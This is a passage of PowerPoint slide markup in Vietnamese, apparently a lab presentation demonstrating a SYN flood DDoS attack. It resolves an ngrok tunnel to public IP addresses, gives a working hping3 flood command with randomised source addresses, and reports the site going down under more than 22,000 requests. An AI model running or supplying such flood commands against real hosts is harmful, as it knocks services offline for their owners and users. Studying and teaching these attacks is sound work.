            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhỏ</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máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sự</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tắc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghẽn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12086168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F5DB4-8118-4218-BF41-381B28614587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="389860"/>
            <a:ext cx="10515600" cy="5787103"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> dung hping3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>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 DDOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SYN Flood </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hping3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: hping3 –help </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kiểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hping3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: host 18a3-14-224-53-137.ngrok-free.app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lấy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đường</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hầm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ngrok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</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sau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>18a3-14-224-53-137.ngrok-free.app has address 52.220.121.212</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>18a3-14-224-53-137.ngrok-free.app has address 18.139.9.214</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>18a3-14-224-53-137.ngrok-free.app has address 18.141.129.246</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>18a3-14-224-53-137.ngrok-free.app has address 18.136.148.247</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>18a3-14-224-53-137.ngrok-free.app has address 13.229.3.203</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>18a3-14-224-53-137.ngrok-free.app has IPv6 address 2406:da18:27f:c800::6e:3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>18a3-14-224-53-137.ngrok-free.app has IPv6 address 2406:da18:27f:c800::6e:0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>18a3-14-224-53-137.ngrok-free.app has IPv6 address 2406:da18:27f:c802::6e:2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>18a3-14-224-53-137.ngrok-free.app has IPv6 address 2406:da18:27f:c801::6e:4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>18a3-14-224-53-137.ngrok-free.app has IPv6 address 2406:da18:27f:c801::6e:1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2176753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3CDC5-C615-4166-9EE7-8D293F7C1B20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="595423"/>
            <a:ext cx="10515600" cy="5581540"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tiếp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ta </a:t>
            </a:r>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>18a3-14-224-53-137.ngrok-free.app has address 52.220.121.212 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>địa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 52.220.121.212</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tiếp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hping3 –S  -p 80 –flood –rand-source 52.220.121.212</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ok  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Giờ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dõi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tiếp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> dung ifconfig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lấy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>địa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ở </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đây</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tôi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lấy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> eth0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nhấp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hơn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 22000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lượt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tôi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>duyệt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thì</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>báo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>không</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trang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sau </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tôi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dừng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thì</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hoạt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thường</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
